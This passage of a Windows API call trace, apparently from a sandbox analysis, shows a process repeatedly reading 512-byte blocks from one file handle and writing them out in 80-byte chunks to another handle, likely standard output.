(_FileHandle=4) returned 0x54 [0092.906] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.906] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] GetFileType (hFile=0x4c) returned 0x1 [0092.907] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.907] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.908] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.908] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.908] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.908] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.909] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.909] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.909] GetFileType (hFile=0x4c) returned 0x1 [0092.909] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.910] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.910] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] GetFileType (hFile=0x4c) returned 0x1 [0092.910] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.910] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.911] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.911] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] GetFileType (hFile=0x4c) returned 0x1 [0092.911] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.911] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.912] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.912] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] GetFileType (hFile=0x4c) returned 0x1 [0092.912] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.912] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.913] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.913] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] GetFileType (hFile=0x4c) returned 0x1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.913] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.913] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.914] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.914] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, 